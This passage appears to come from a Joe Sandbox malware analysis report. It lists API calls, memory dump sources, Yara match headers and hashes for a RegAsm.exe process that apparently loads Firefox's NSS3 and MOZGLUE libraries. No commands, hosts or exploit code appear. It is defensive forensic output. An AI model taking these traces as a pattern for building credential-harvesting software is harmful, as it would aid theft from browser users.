                                                                                                          • Part of subcall function 6C1AACC0: PR_Unlock.NSS3 ref: 6C1AADC0
                                                                                                          • Part of subcall function 6C1AACC0: PR_Unlock.NSS3 ref: 6C1AAE8C
                                                                                                          • Part of subcall function 6C1AACC0: free.MOZGLUE(?), ref: 6C1AAEAB
                                                                                                        • memcpy.VCRUNTIME140(6C313084,6C3102AC,00000090), ref: 6C24AF94
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                        • String ID: SSL
                                                                                                        • API String ID: 2424436289-2135378647
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: NameName::
                                                                                                        • String ID: {flat}
                                                                                                        • API String ID: 1333004437-2606204563
                                                                                                        APIs
                                                                                                        • moz_xmalloc.MOZGLUE(0Kl,?,6C0D4B30,80000000,?,6C0D4AB7,?,6C0943CF,?,6C0942D2), ref: 6C0A6C42
                                                                                                          • Part of subcall function 6C0ACA10: malloc.MOZGLUE(?), ref: 6C0ACA26
                                                                                                        • moz_xmalloc.MOZGLUE(0Kl,?,6C0D4B30,80000000,?,6C0D4AB7,?,6C0943CF,?,6C0942D2), ref: 6C0A6C58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: moz_xmalloc$malloc
                                                                                                        • String ID: 0Kl
                                                                                                        • API String ID: 1967447596-1544165026
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: GlobalMemoryStatus_memset
                                                                                                        • String ID: @
                                                                                                        • API String ID: 587104284-2766056989
                                                                                                        APIs
                                                                                                        • PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A1370: GetSystemInfo.KERNEL32(?,?,?,?,6C1A0936,?,6C1A0F20,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000), ref: 6C1A138F
                                                                                                        • PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                          • Part of subcall function 6C1A1110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C1A0936,00000001,00000040), ref: 6C1A1130
                                                                                                          • Part of subcall function 6C1A1110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C1A0936,00000001,00000040), ref: 6C1A1142
                                                                                                          • Part of subcall function 6C1A1110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1A0936,00000001), ref: 6C1A1167
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                        • String ID: clock
                                                                                                        • API String ID: 536403800-3195780754
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$calloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3339632435-0
                                                                                                        • Opcode ID: 64fa7ccdfa1e7eaf8ebe51aa52a440148e5560d482a715eba145a49e712c8084
                                                                                                        • Instruction ID: 8815f8f709fc86c09bea79e6c4351ff0fca6c94cc7df9b6d2f23e442629dc0a0
                                                                                                        • Opcode Fuzzy Hash: 64fa7ccdfa1e7eaf8ebe51aa52a440148e5560d482a715eba145a49e712c8084
                                                                                                        • Instruction Fuzzy Hash: 7E31D271A58389CFDB00AF7EC5456A97BF8BF06309F01462DED8987E11DB3184A5CB82
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C1B2AF5,?,?,?,?,?,6C1B0A1B,00000000), ref: 6C210F1A
                                                                                                        • malloc.MOZGLUE(00000001), ref: 6C210F30
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C210F42
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C210F5B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Valuemallocmemcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2332725481-0
                                                                                                        • Opcode ID: d1a30ab5cf85ed090343f86bfa9967a0b1da681ce8f68a637851c10ad5ed38ca
                                                                                                        • Instruction ID: 2f9c6a6d84dcc2474d73de8046c49128617015b7c7d64e9e5848b67328fee8da
                                                                                                        • Opcode Fuzzy Hash: d1a30ab5cf85ed090343f86bfa9967a0b1da681ce8f68a637851c10ad5ed38ca
                                                                                                        • Instruction Fuzzy Hash: 8301DD71F142885FE710277D9D06A5676ECEF52259F010235ED09C2E11DF31D565C6E2